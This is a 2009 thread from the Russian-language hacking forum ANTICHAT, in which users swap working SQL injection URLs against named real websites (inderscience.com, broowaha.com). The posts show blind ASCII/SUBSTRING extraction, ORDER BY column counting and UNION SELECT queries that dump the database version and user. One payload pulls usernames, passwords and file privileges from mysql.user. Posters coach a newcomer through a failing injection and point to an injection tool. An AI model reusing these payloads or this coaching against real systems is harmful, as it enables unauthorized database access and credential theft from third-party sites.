ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.08.2009, 17:16
|
|
Новичок
Регистрация: 27.07.2009
Сообщений: 13
Провел на форуме:
63551
Репутация:
13
|
|
Сообщение от nemaniak
Крутить как слепую...
Например http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=100,1,0)-- выдает ошибку, значит наш ascii символ меньше...
пробуем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=50,1,0)-- ошибки нет, значит символ больше, http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))>=52,1,0)-- максимальное значение на котором не выдает ошибку, проверяем http://www.inderscience.com/browse/index.php?journalID=114+and+1=IF(ASCII(SUBSTRING(( SELECT+version()),1,1))=52,1,0)-- ошибки нет, верно.
Т.е. первый ascii символ равен 52, значит версия мускуля 4-я.
Подробнее https://forum.antichat.ru/showpost.php?p=407227&postcount=3
К чему такие громоздкие конструкции?
Код:
http://www.inderscience.com/browse/index.php?journalID=114+and+substring(version(),1,1)=4/*
Этого достаточно...
|
|
|
13.08.2009, 23:04
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от fraIzer
К чему такие громоздкие конструкции?
Код:
http://www.inderscience.com/browse/index.php?journalID=114+and+substring(version(),1,1)=4/*
Этого достаточно... достаточно для определения версии не более, а буквы ты тоже будешь с числами сравнивать? а вот ascii код можно...
|
|
|
|
14.08.2009, 15:51
|
|
Новичок
Регистрация: 13.08.2009
Сообщений: 2
Провел на форуме:
2194
Репутация:
0
|
|
http://www.broowaha.com/profile.php?id=2434+ORDER+BY+18/* выдает ошибку,
http://www.broowaha.com/profile.php?id=2434+ORDER+BY+17/* срабатывает нормально. ОК,значит столбцов 17.
Делаю http://www.broowaha.com/profile.php?id=2434+UNION+SELECT+11111,22222,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17/*
но ничего не выводит. Пытался определить версию, методом, которым вы меня научили:
http://www.broowaha.com/profile.php?id=2434+AND+1=IF(ASCII(SUBSTRING((SELE CT+version()),1,1))%3E=52,1,0)/*
ответ таков:
Error, select query failed: 1064:You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT version()),1,1))>=52,1,0)/* AND tAuthors.status = 'activ
Как дальше действовать?
|
|
|
|
14.08.2009, 15:57
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
http://www.broowaha.com/profile.php?id=-2434+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),user()),7,8,9,0,11,12,13,14,15,16,17/*
|
|
|
|
14.08.2009, 16:11
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Сообщение от fast_start
http://www.inderscience.com/browse/index.php?journalID=114'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 30
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/apache2-default/htdocs/browse/index.php on line 38
Query Error:
SELECT coverImage FROM comanche.journalsMetadata WHERE sectionID=114\'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
что можно сделать? надеюсь я не ошибся темой) 
Код:
http://www.inderscience.com/browse/book.php?journalID=1001&year=2005&action=chapter&chapNum=23+union+select+1,2,3,unhex(hex(concat(file_priv,0x3a,user,0x3a,password))),5,unhex(hex(concat(version(),0x3a,user(),0x3a,database()))),7+from+mysql.user--
nemaniak, fraIzer не стоит торопиться с выводами.
|
|
|
|
15.08.2009, 02:04
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме:
438137
Репутация:
66
|
|
Вопрос: есть бажный PHP-скрипт, который использует значение переменной HTTP_HOST при генерации XML (то есть в самом XML это значение используется без какого-либо экранирования спец. символов) и потом его отдаёт на скачивание. Что можно провернуть в данном случае? Да, мы можем варьировать HTTP Host заголовком..но что это нам даёт?
|
|
|
|
15.08.2009, 02:44
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
если изменить поле Host в запросе то веб-сервер просто не узнает какому из виртуальных хостов пришел запрос. То есть до скрипта он уже вряд ли дойдет
|
|
|
|
15.08.2009, 18:22
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от fast_start
http://www.broowaha.com/profile.php?id=2434+ORDER+BY+18/* выдает ошибку,
http://www.broowaha.com/profile.php?id=2434+ORDER+BY+17/* срабатывает нормально. ОК,значит столбцов 17.
Делаю http://www.broowaha.com/profile.php?id=2434+UNION+SELECT+11111,22222,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17/*
но ничего не выводит. Пытался определить версию, методом, которым вы меня научили:
http://www.broowaha.com/profile.php?id=2434+AND+1=IF(ASCII(SUBSTRING((SELE CT+version()),1,1))%3E=52,1,0)/*
ответ таков:
Error, select query failed: 1064:You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT version()),1,1))>=52,1,0)/* AND tAuthors.status = 'activ
Как дальше действовать?
Если у тебя есть обычная скуля.
Зачем мучать себя слепой?
Кстате скачай лучше SIPT 4.
|
|
|
|
15.08.2009, 18:47
|
|
Новичок
Регистрация: 27.07.2009
Сообщений: 13
Провел на форуме:
63551
Репутация:
13
|
|
Сообщение от z00MAN
Код:
http://www.inderscience.com/browse/book.php?journalID=1001&year=2005&action=chapter&chapNum=23+union+select+1,2,3,unhex(hex(concat(file_priv,0x3a,user,0x3a,password))),5,unhex(hex(concat(version(),0x3a,user(),0x3a,database()))),7+from+mysql.user--
nemaniak, fraIzer не стоит торопиться с выводами. Речь шла о конкретной скуле!!! Ты же показываешь совершенно другую!!!
Сообщение от nemaniak
достаточно для определения версии не более, а буквы ты тоже будешь с числами сравнивать? а вот ascii код можно...
Опять же на протяжении всего поста ты показывал ему как узнать версию, я и подмитил, что не к чему использовать такие громоздкие конструкции при определении версии(это не оправдывает себя), вот когда названия таблиц и столбцов подбирать начнешь, тогда да, но это совершенно другой вопрос, так или иначе то, что ты ему объяснил, это как вилами по воде, надеюсь понимаешь о чём я.
|
|
|
|
15.08.2009, 18:54
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Если вам надо версию то )
&chapNum=-1+union+select+version() 
И таким макаром |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
